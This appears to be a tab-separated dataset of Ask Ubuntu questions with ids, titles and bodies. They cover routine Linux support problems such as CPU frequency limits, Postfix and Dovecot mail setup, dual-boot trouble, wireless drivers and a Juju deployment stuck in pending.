303882	maximum cpu frequency stuck at low value	i have observed a problem with ubuntu 13.04 . the problem was not there on 11.10 i used earlier . the maximum cpu frequency is stuck at 2ghzon my intel ( r ) core ( tm ) i7-2620m cpu @ 2.70ghz ( dell lattitude e6320 ) # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 2000000 # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 2701000 2700000 2400000 2200000 2000000 1800000 1600000 1400000 1200000 1000000 800000 # echo 2700000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 2000000 i can set scaling_max_freq to a lower value and that works . i can also go back to 2ghz , but not more than that : # echo 800000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 800000 # echo 2000000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 2000000 # echo 2200000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 2000000 nothing i do seems to help - i have installed tlp , uninstalled it , checked different kernel versions available in 13.04 . i have attached and removed the power supply . i have changed the governors and also used the userspace . regardless of whether i am on ac or battery , the above problem persists . i have seen people having similar problems before ( here , or here ) , but that was related to a kernel bug back in 2008 and does not seem to be relevant . does anyone know how to fix this ?
303887	can not access my web content that i just copied to /op/lampp/htdocs directory ?	now i have copied and pasted my own web file that i previously had created on windows 7 . the gksudo nautilus command did certainly help me to copy that web file into the /opt/lampp/htdocs directory . as now i have my web file in the directory , when i try to access it by browsing it in the browser like localhost/mywebfile it pops out the access forbidden ! error like access forbidden ! you do n't have permission to access the requested object . it is either read-protected or not readable by the server . if you think this is a server error , please contact the webmaster . error 403 localhost apache/2.4.3 ( unix ) openssl/1.0.1c php/5.4.7 also i can not access that folder that i just copied to the /opt/lampp/htdocs directory . the error says : - this location could not be displayed . you do not have the permissions necessary to view the contents of âmywebfilesâ .
303888	postfix smtp not available from external network	i 'm trying to setup an smtp server using postfix . i already have virtual mailboxes and a dovecot imap server running ( and working ) . i can mail my @ ema.il and see the mail coming in with an imap client . however , sending mails from external locations does n't work . i did a netcat from internal : root @ cs : / # netcat localhost 25 220 camilstaps.nl esmtp postfix ( ubuntu ) helo localhost 250 camilstaps.nl mail from : < test @ vivisoft.nl > 250 2.1.0 ok rcpt to : < info @ vivisoft.nl > 250 2.1.5 ok data 354 end data with < cr > < lf > . < cr > < lf > subject : test hello . 250 2.0.0 ok : queued as 19cba412f0 and also tried a netcat from an external server , but that did n't work , i do n't get a response ( the shell keeps open until i ^c or a timeout occurs ) . i thought the server was n't listening on every ip , so i tried a netstat , and this was the result : tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen 2378/master tcp6 0 0 : ::25 : : : * listen 2378/master so that ca n't be the problem , right ? but i ca n't figure out what the problem is . here 's /etc/postfix/master.cf ( it was quite long so i removed the comments ) : smtp inet n - - - - smtpd pickup unix n - - 60 1 pickup cleanup unix n - - - 0 cleanup qmgr unix n - n 300 1 qmgr tlsmgr unix - - - 1000 ? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - - - - smtp relay unix - - - - - smtp showq unix n - - - - showq error unix - - - - - error retry unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache maildrop unix - n n - - pipe flags=drhu user=vmail argv=/usr/bin/maildrop -d $ { recipient } uucp unix - n n - - pipe flags=fqhu user=uucp argv=uux -r -n -z -a $ sender - $ nexthop ! rmail ( $ recipient ) ifmail unix - n n - - pipe flags=f user=ftn argv=/usr/lib/ifmail/ifmail -r $ nexthop ( $ recipient ) bsmtp unix - n n - - pipe flags=fq . user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t $ nexthop -f $ sender $ recipient scalemail-backend unix - n n - 2 pipe flags=r user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store $ { nexthop } $ { user } $ { extension } mailman unix - n n - - pipe flags=fr user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py $ { nexthop } $ { user } and postconf -n gives : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix home_mailbox = maildir/ inet_interfaces = all inet_protocols = all mailbox_command = mailbox_size_limit = 0 mydestination = $ myhostname , localhost. $ mydomain , $ mydomain , localhost myhostname = camilstaps.nl mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relayhost = smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_client_restrictions = permit_mynetworks permit_inet_interfaces permit_sasl_authenticated permit_tls_clientcerts reject_unauth_destination smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = smtpd_sasl_path = private/auth-client smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom virtual_gid_maps = static:5000 virtual_mailbox_base = /home/vmail/ virtual_mailbox_domains = /etc/postfix/vhosts virtual_mailbox_maps = hash : /etc/postfix/vmaps virtual_minimum_uid = 1000 virtual_uid_maps = static:5000
303892	terminal wo n't pick up java	why does the terminal say java does n't exist ?
303894	ubuntu 12.10 x64 booting problem	just last night i installed ubuntu 12.10 on my lenovo g580 . specs : core i5 3rd gen 4 gb ram 500 gb hdd intel hd 4000 igp i 'm dual booting between windows 7 & ubuntu 12.10 . but now i 'm facing a problem while booting ubuntu . it sometimes boots , but sometimes it does n't . i get a black screen with a window saying : your display , graphics card , input devices are not detected properly , you need to reconfigure it . but sometimes i do n't face such problem , it just boots alright . when it boots , i can see that it shows `` graphics : intel ivybridge '' in `` about this computer '' . so what 's wrong ? any solution ? really ? nobody can help ?
303896	installing from .run	today i have downloaded metasploit-latest-linux-installer.run . i have clicked the icon to install only to be greeted with the error message : could not display `` /home/daniel/downloads/metasploit-latest-linux-installer.run '' . there is no application installed for executable files . do you want to search for an application to open this file ? upon clicking yes the results of the search only show one application . this application is called `` pypar2 '' . ( a graphical interface for the par2 utility ) i hesitantly click install only to be told further python support is required and i click install for that also . window pops up ... ... installing packages ... .done pypar2 also installs and i open . this does n't seem right this seems to be a program to verify the contents ? i do n't know what i am doing wrong this is on my second day using ubuntu
303900	does running a console emulator will make the laptop hotter ?	i have a gba rom , and a gba emulator which is vba-m . if i do run the rom on the emulator will it cause an additional heat to the laptop ? will it be the same result on windows system ?
303904	wubi error installing - extraction failed with code : 2	i tried to reinstall ubuntu with wubi after having a problem on my existing wubi install which booted to a grub > prompt . but now i have new problem : ubuntu installer an error occured : extraction failed with code : 2 for more information , please see the log file : c : \users\joseda~1.per\appdata\local\temp\wubi-12.04-rev272.log here 's the download to the log file : http : //www.mediafire.com/ ? ozois9eeo6aa7ya
303908	apt-get upgrade - packages have been kept back : mysql	on my ubuntu vps , i 've this error , what does it mean ? why were packages kept back ? i was advised not to do dist-upgrade . my question is not how to solve this , but why this happened ? the following packages have been kept back : mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded .
303909	if i am continuously updating and saving my document will ubuntu one update the cloud version automatically ?	if i am working on a document and continuously saving and updating the document . does it update the document i have on ubuntu one or do i have to manually keep deleting and updating the document i saved on ubuntu one ?
303915	microsoft office communicator 2007 r2 in ubuntu 13.04	i am using ubuntu 13.04 64bit os . i am new in linux.in our network all other sysetms are windows platforms and all systems have microsoft office communicator also.is there any chance to use office communicator in ubuntu or any other third party software . if any software is there let me know how to install server certificate on it . ( step by step ) thanks
303921	how to upgrade skype 4.0 to skype 4.2	i am using ubuntu 11.10 64-bit . i am currently using skype 4.0 and i want to upgrade my skype to 4.2 . do let me know the way to upgrade my skype
303926	wmii on ubuntu 12.10	i installed the quantal wmii deb package , but when i try to log into wmii it is completely unresponsive . has anyone else experienced this issue ?
303929	unity launcher uses generic icon for firefox in ubuntu 12.04	after upgrading my distribution from 11.04 to 11.10 to 12.04 when starting a firefox instance ( from alt+f2 , not having a fixed launcher element ) the icon displayed for it in the launcher and application switcher is the generic one ( grey rectangle with a question mark in the middle ) . why is that and how can i get the firefox icon to display ?
303934	making a unity launcher bookmark app	if you like to have quick link bookmarks on your unity launcher check out this easy to make application using some information from various online sources https : //help.ubuntu.com/community/unitylaunchersanddesktopfiles i came up with my little desktop application . start by installing desktop shortcuts sudo apt-get install -- no-install-recommends gnome-panel then run gnome-desktop-item-edit -- create-new ~/desktop create a basic launcher desktop shortcut . once your default desktop file is created you will want to edit it . example below : gedit < your file name > example : my below desktop file script is named `` bookmarks '' . if you are copy/pasting the script below , you will want to account for that with my file below or it will not run properly . [ desktop entry ] version=1.0 type=application name=bookmarks icon=firefox.png exec=xdg-open https : //askubuntu.com/ terminal=false actions=askubuntu ; google ; gmail ; yahoo [ desktop action askubuntu ] name=askubuntu exec=xdg-open http : //askubuntu.com/ onlyshowin=unity ; [ desktop action google ] name=google exec=xdg-open http : //www.google.com onlyshowin=unity ; [ desktop action gmail ] name=gmail exec=xdg-open http : //www.gmail.com onlyshowin=unity ; [ desktop action yahoo ] name=yahoo exec=xdg-open http : //www.yahoo.com onlyshowin=unity ; once complete move file to applications folder , and can be treated as an application . sudo nautilus move file to usr/share/applications then drag drop to unity launcher if desired . here is where the bash script becomes useful . once the desktop link is on the unity launcher you will have several right click options as listed below in actions . note the corresponding actions at the bottom of the file . you can change the actions to sort in your preference and set the default `` exec= '' to your left click preference as well one of the great features of this as a shortcut on your unity launcher is the right click `` quit '' function which will close all open windows .
303935	when is ubuntu tv available ?	i am really interested in using ubuntu tv , however the most recent posts that i could find are from 2012 and only explain how to install the `` demo '' version . does anyone know if this available , or when it will be ? also will this be available as a standalone package ( ie , not built into tv ) ? thanks for all the help !
303939	unable to update via terminal	i am using ubuntu 11.10 64-bit . when i try to run sudo apt-get update . the following throws in the terminal : hit http : //archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/restricted translation-en ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //toolbelt.heroku.com ./ release ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //archive.ubuntu.com oneiric-updates/main translationindex hit http : //archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //archive.ubuntu.com oneiric-updates/universe translationindex hit http : //archive.ubuntu.com oneiric-backports/main amd64 packages hit http : //archive.ubuntu.com oneiric-backports/restricted amd64 packages hit http : //archive.ubuntu.com oneiric-backports/universe amd64 packages hit http : //security.ubuntu.com oneiric-security/universe translation-en hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main amd64 packages hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //archive.ubuntu.com oneiric-backports/multiverse amd64 packages hit http : //archive.ubuntu.com oneiric-backports/main i386 packages hit http : //archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //archive.ubuntu.com oneiric-backports/main translationindex hit http : //archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //archive.ubuntu.com oneiric-backports/universe translationindex hit http : //archive.ubuntu.com oneiric/main translation-en hit http : //archive.ubuntu.com oneiric/multiverse translation-en hit http : //archive.ubuntu.com oneiric/restricted translation-en hit http : //archive.ubuntu.com oneiric/universe translation-en hit http : //archive.ubuntu.com oneiric-updates/main translation-en hit http : //archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //archive.ubuntu.com oneiric-updates/universe translation-en hit http : //archive.ubuntu.com oneiric-backports/main translation-en hit http : //archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //archive.ubuntu.com oneiric-backports/universe translation-en hit http : //toolbelt.heroku.com ./ packages ign http : //deb.opera.com stable/non-free translation-en_us ign http : //deb.opera.com stable/non-free translation-en ign http : //archive.canonical.com oneiric/partner translation-en_us ign http : //linux.dropbox.com oneiric/main translation-en_us err http : //ppa.launchpad.net oneiric/main sources 404 not found err http : //ppa.launchpad.net oneiric/main amd64 packages 404 not found ign http : //archive.canonical.com oneiric/partner translation-en ign http : //archive.canonical.com oneiric/partner translation-en_us ign http : //linux.dropbox.com oneiric/main translation-en err http : //ppa.launchpad.net oneiric/main i386 packages 404 not found ign http : //archive.canonical.com oneiric/partner translation-en ign http : //dell.archive.canonical.com oneiric-dell/public translation-en_us ign http : //extras.ubuntu.com oneiric/main translation-en_us ign http : //dell.archive.canonical.com oneiric-dell/public translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //extras.ubuntu.com oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //toolbelt.heroku.com ./ translation-en_us ign http : //toolbelt.heroku.com ./ translation-en w : failed to fetch http : //ppa.launchpad.net/ferramroberto/filezilla/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ferramroberto/filezilla/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ferramroberto/filezilla/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
303943	can not find device to fsck	i am using ubuntu to try and repair a damaged sdhc card . the card has two partitions and i want to fix the ext4 partition : ubuntu @ ubuntu : /dev $ mount | grep /media /dev/sdb1 on /media/1af7-904a type vfat ( rw , nosuid , nodev , uid=999 , gid=999 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) /dev/sdb2 on /media/8fe3c9ad-c8f5-4b39-aec2-f6e8dba743e0 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) ubuntu @ ubuntu : /dev $ df -h | grep /media /dev/sdb1 56m 34m 23m 61 % /media/1af7-904a /dev/sdb2 30g 2.1g 26g 8 % /media/8fe3c9ad-c8f5-4b39-aec2-f6e8dba743e0 i think fsck is the way to do this . but i can not do an fsck while the partition is mounted , so i unmount the ext4 partition , but then i can not find the partition to run the fsck against ! how can i run the fsck ? ubuntu @ ubuntu : /dev $ umount /media/8fe3c9ad-c8f5-4b39-aec2-f6e8dba743e0 ubuntu @ ubuntu : /dev $ df -h filesystem size used avail use % mounted on /cow 880m 89m 792m 11 % / udev 873m 4.0k 873m 1 % /dev tmpfs 352m 860k 351m 1 % /run /dev/sr0 696m 696m 0 100 % /cdrom /dev/loop0 667m 667m 0 100 % /rofs tmpfs 880m 52k 880m 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 880m 80k 880m 1 % /run/shm /dev/sdb1 56m 34m 23m 61 % /media/1af7-904a
303945	procmail with postfix and virtual mailboxes	i have setup a working smtp , imap and pop3 server using postfix and dovecot . i have setup virtual mailboxes using the format /home/vmail/ % d/ % u , where % d is the domain ( e.g . camilstaps.nl ) and % u is the 'user ' ( e.g . info ) - thus info @ camilstaps.nl has /home/vmail/camilstaps.nl/info . i now would like to setup procmail to use filters . i have read this wiki , for example , but i do n't think it applies to my situation with virtual mailboxes . i have not enough knowledge of procmail to do this all by myself . could anyone explain to me or give me a link where to start ? i searched on google but only came across useless forum threads , no documentation or tutorial . that makes me wonder if it 's even possible to do this .
303948	how do i install ubuntu 12.04 inside windows without downloading it through the wubi installer ?	i tried mounting and image of the .iso file using demon tools and then running it ... it worked ! ! the installer ran but there was no third option to install the ubuntu inside windows ... .. could you please provide me a link from where i can download the iso file with the inside windows option ? ? because i want to install this software even in the unavailability of internet connection . thank you very much in advance . : - )
303949	rhythmbox hangs when changing song properties	i am having problems when trying to change song properties in rhythmbox 2.98 ( ubuntu 13.04 ) . i just choose one song , click on properties and do some changes and press close . now everything seems fine , but it is not . trying to open properties one more time hangs rhythmbox - it becomes unresponsive for a long tome , but changes really occur , if i wait long enough , additionally timeout was reached error has been shown . i think problem might be in where i have saved songs , because when i copy the song to home folder which is on the same partition as whole system , then editing goes fine . about songs : they are saved on another ext4 partition and it is mounted on start-up by fstab . i am not sure if it is correct . fstab record here : uuid=3265c492-8ff6-4421-830e-91508d27a020 /mnt/home ext4 auto , user , rw , sync , exec 0 2 hope someone can help me , because i don`t know where else to go . thanks !
303950	why are these command prompts necessary ? or can i do most of these things from the gui ?	i tried ubuntu in the past , and found it great , until i found out i needed arcane commands such as : wget https : //launchpad.net/~upubuntu-com/+archive/gtk3/+files/win2-7_0.1_all.deb sudo dpkg -i win2-7_0.1_all.deb gsettings set org.gnome.desktop.wm.preferences theme 'win2-7-theme' also , i could not access ntfs partitions , apparently because i could n't figure out the command prompt well enough . is there some way to eliminate the need for this ? i am willing to learn some basics , and i still run cmd in windows ( m $ dos freak ) , because it 's faster than the gui , but i am not willing to learn this kind of arcane syntax to get what i consider basic functionality . can this be worked on by the community ? i am not a programmer . am i missing something that 's there already ?
303951	shell script now working on post/get request	i have a simple script in php to fetch files from my github repository < ? php echo shell_exec ( 'git pull ' ) ; ? > when i ssh into my server and run this script like this : php github.php i see an output of this sort and the files are indeed updated remote : counting objects : 5 , done . remote : compressing objects : 100 % ( 2/2 ) , done . remote : total 3 ( delta 1 ) , reused 3 ( delta 1 ) unpacking objects : 100 % ( 3/3 ) , done . from https : //github.com/vivek1729/test bbe5690..57169ec master - > origin/master content-type : text/html updating bbe5690..57169ec fast-forward index.html | 2 +- 1 files changed , 1 insertions ( + ) , 1 deletions ( - ) however when i run this script from the browser , i do not see any ouput and the git pull request does n't occur . permissions for github.php are default and as follows : rw-r -- r -- 1 vivekpradhan inetuser 882 jun 3 09:26 github.php also i tried to chown the file to the apache user . to find out the name of the web user of apache . i ran echo shell_exec ( 'whoami ' ) ; and it output `` vivekpradhan '' . so i think the apache web user has access to the particular file . i am on a godaddy server running centos . how can i get the script to work on a browser get/post request ? does this have to do with the some file permissions on the linux server ? i already have git installed on the server . any help is deeply appreciated .
303960	moving from one monitor to another on a dual monitor system	i am using 13.04 on a laptop with an additional screen connected so that when i 'm designing websites , the 2nd monitor is used as a preview page to reduce the need to shuffle through windows to find the one i need . the problem the problem is that i can easily move from the main screen to the 2nd screen ( on the right ) without any problems , however , getting back to the working window , screen 1 i hit a barrier at the screen edge an i have to take a run up and force my way over what seems like a barrier . the question can anyone tell me where the setting is for reducing or eliminating this 'step ' between screens . thank you in advance . edit this was happening when i had the unity launcher displayed on both windows , but stayed there when i selected the option to keep the launcher on the main screen ( screen 1 ) only .
303964	desktop - unity - problem	i upgraded software couple days ago . now i have a problem with my desktop . i 'm attaching a print screen to show what i mean . click on the image to open a full-resolution version .
303971	setting up a bluetooth audio-microphone headset on ubuntu 12.04	i recently purchased a henson bth033 bluetooth headset with a built in microphone . i would ideally like to use it as my primary audio-microphone output-input on my ubuntu install . here is my progress so far : i have paired and connected the headset using the stock bluetooth interface in the settings , the one that is also listed in the top-bar menu . it connects successfully every time . however , the device is not listed as either an audio or microphone option in the sound settings , and does not receive sound when music is playing . strangely though , the controls on the headset successfully pause , play and skip music playing on my computer . what do you suggest that i do in order to get the bluetooth i/o recognised in sound menu and working ? thanks ! !
303972	avertv hybrid volar q	i have recently received a avertv hybrid volar q usb tv tuner and it works great in windows . however , i am unable to get ubuntu to detect it . i would appreciate hearing from anyone who has managed to use this device with linux .
303977	why upgrade to new linux kernel in ubuntu ?	i want to know what is the benefit/necessity of upgrading to a new kernel ?
303979	uninstalling mysql from ubuntu	i installed mysql in my system using ubuntu12.10 by tar.gz file . now , i wanted to remove it from the system , please suggest me the ways to uninstall it . thanks in advance
303981	source .bashrc does nothing	after installing virtualenvwrapper i edited .bash_profile and added those lines ( it was blank actually ) export workon_home= '' $ home/.virtualenvs '' source /usr/local/bin/virtualenvwrapper.sh then i sourced .bashrc the normal is to apply the changes and output some lines on terminal but nothing happens what is the problem ?
303982	installing printer from local network	my problem is really simple . i have a printer in my local network `` hp laserjet p4015 '' and i would like to connect to it but i do n't know how . could someone please guide me how can i add a new printer in ubuntu `` 13.04 ''
303983	ubuntu 13.04 cant read windows 8 partition anymore	i freshly installed ubuntu 13.04 on my windows 8 pc . dual booting it , i created a symbolic link while on ubuntu to my windows based dropbox directory . the link worked fine while the computer was still on . i shut it down normally with a full shut down and when i turned it back on and it booted automatically into ubuntu , it did n't work anymore . i could no longer read the windows partitions and the link was n't working . the error message i got said that it was because windows was not shut down properly . i rebooted into windows and turned it off again to test it , but it did n't work . any ideas what went wrong ?
303990	rsync creating 0 byte files on cifs mounted drive	hi i have been using rsync successfully to backup files from my external drive to a cifs mounted shared drive since ubuntu 10.04 now with 13.04 i am getting a strage behavior with the following command rsync -av /media/hari/myextdrive/ /home/mydfsmountedcifsdrive/databackup/ the `` mydfsmountedcifsdrive '' is mounted using options sudo mount -t cifs //10.1.1.11/dfsroot/archive/ /home/mydfsmountedcifsdrive -o user=hari , rw , nosuid , gid=1000 , uid=1000 , hard now when i use the rsync command . the entire directory structure is created . i have several files in sub-drectories with the `` img '' extension . the sub-directories are also created appropriately . but for the files in these subdirectories , i have a file that is zero bytes that starts with a `` . '' and has a weird hex extension actual file p_248509-a_060.img 36mb instead rsync creates ( note the `` . '' in the beginning ) .p_248509-a_060.img.cluipk 0 bytes does anyone know what is going on i can use `` cp -r '' and copy these files accurately . i have not seen rsync do this with my 10.04 systems . any ideas ?
303991	brightness control does n't work on my lenovo g580 laptop in ubuntu12.10 ?	my laptop has intel core i5 processor and ubuntu 12.10 32-bit os .
303994	weird wireless problem	i upgraded to 13.04 2 days ago , wireless worked fine . then i got some updates the next day , installed all . now i can not connect to my wpa2 secured network . smart-phones , tablets and windows 7 ( i use dual boot on my laptop ) work perfect . is that somehow related with bcm4313 802.11b/g/n wireless lan controller ? if yes , how to preceed ? thank you in advance edit : adding the output of sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:12:00.0 logical name : eth1 version : 01 serial : c0 : f8 : da:5c:8c:86 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : fbb00000-fbb03fff *-network description : ethernet interface product : ar8152 v2.0 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:13:00.0 logical name : eth0 version : c1 serial : f0:4d : a2 : d8 : cc:36 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:48 memory : fba00000-fba3ffff ioport : e000 ( size=128 )
303997	wireless not working - dell inspirion mini 10	i installed ubuntu version 12.04.2 desktop-i386 on my desktop notebook mini version 10 everything went fine but the wireless is not working at all . i press the wireless button on the dell and nothing happens at all , so i ca n't see any networks at all . please instruct me , and please bare in mind that i 'm completely new to ubuntu so each instruction should be basic as possible . i 've reset bios so far and nothing 's changed . thank you
304001	script to turn off wacom bamboo touch randomly stops working	i 've created a script to turn off the wacom bamboo touch . # ! /bin/bash xsetwacom set `` bamboo 16 fg 4x5 finger touch '' touch off xsetwacom set `` wacom bamboo 16fg 4x5 pen eraser '' touch off xsetwacom set `` wacom bamboo 16fg 4x5 finger pad '' touch off i put the script in my start up applications , and it always works initially , but then after a few hours it stops randomly and the touch goes back on . there seems to be no rhyme or reason - when i execute the script again , touch turns off again . i 'm wondering if it 's a problem with the script itself ... ?
304003	installed ubuntu 13.04 but pc still tries to boot up win7	so i installed ubuntu 13.04 on my pc . in the installation i chose the option to only install ubuntu and delete win7 completely . when i reboot after the installation is complete it tries to boot up win7 with the following error : status : 0xc000000e info : the boot selection failed because a required device is inaccessible . i 'm new to the whole linux thing . appreciate any help i can get . edit : here 's my fdisk log-file as requested disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000218b6 device boot start end blocks id system /dev/sda1 * 2048 216518655 108258304 83 linux /dev/sda2 216520702 250068991 16774145 5 extended /dev/sda5 216520704 250068991 16774144 82 linux swap / solaris disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa5ae9d9c device boot start end blocks id system /dev/sdb1 * 2048 3907026943 1953512448 7 hpfs/ntfs/exfat
304010	what does ~ $ stand for ?	what does ~ $ stand for ? for example : user @ ubuntu : ~ $ so far i know that the $ sign is a symbol for a regular user . if i 'm not mistaken root have # at the end . i also think that $ has something to do with the home folder . in my search i found $ home command showing home directory : bash : /home/user : is a directory i also found a lot of commands in the forums that begin with $ : $ sudo apt-get update so for what does $ actually stand for ? edit ( 28.01.2014 ) : today i came across this video that totally answers my question from 8 months ago and decided to share it here : ) bash basics - https : //www.youtube.com/watch ? v=x73wteltyhu
304017	how to set up remote desktop sharing through ssh ?	is there a way to view ( and control ) a remote desktop through ssh ? i will not have physical access to the remote host machine .
304025	assistance recovering/reinstalling/installing ubuntu and win7	new computer with windows 7 installed , i defrag , shrink , re-boot from ubuntu liveusb , go to gparted and look at partitions before installing ubuntu ... .for some reason win7 is still taking up 400g of my hd ! i resized partition down with gparted , exit and yes of course i ca n't boot into windows . when i go to install ubuntu in new large unallocated space i get a blank screen at the point you are asked what kind of installation you want . i have ubuntu 12.04 liveusb , windows 7 re-installation disk and driver disks also . the hdd currently has 3 allocated partitions : 'diag ' fat16 , 'recovery ' ntfs and 'os ' ntfs which has a red ' ! ' next to it .
304031	how to fix black screen after install nvidia driver ?	i got a new laptop ( asus g75vx ) with a geforce g70mx card . i installed ubuntu 13.04 on it and it works , but when i try to go and install the nvidia driver from the update system , when i reboot there is only a black screen . i am new to ubuntu so i do n't know how to fix this problem neither how to get a log with what went wrong on the installation .
304039	how to tell a wlan card supports rfmon mode	can someone please tell me how to check if a wlan card supports promiscuous mode
304040	agent-state : pending for over 20 minutes	i 'm using juju against hp cloud and the instance shows built and i can ping it fine but the juju status is showing it 's still pending and it 's not coming up in a browser . any ideas on what could cause this and how i can diagnose what 's going on ? machines : `` 0 '' : agent-state : started agent-version : 1.11.0 dns-name : 15.185.97.43 instance-id : `` 1569389 '' series : precise `` 1 '' : instance-id : pending series : precise services : juju-gui : charm : cs : precise/juju-gui-61 exposed : true units : juju-gui/0 : agent-state : pending machine : `` 1 ''
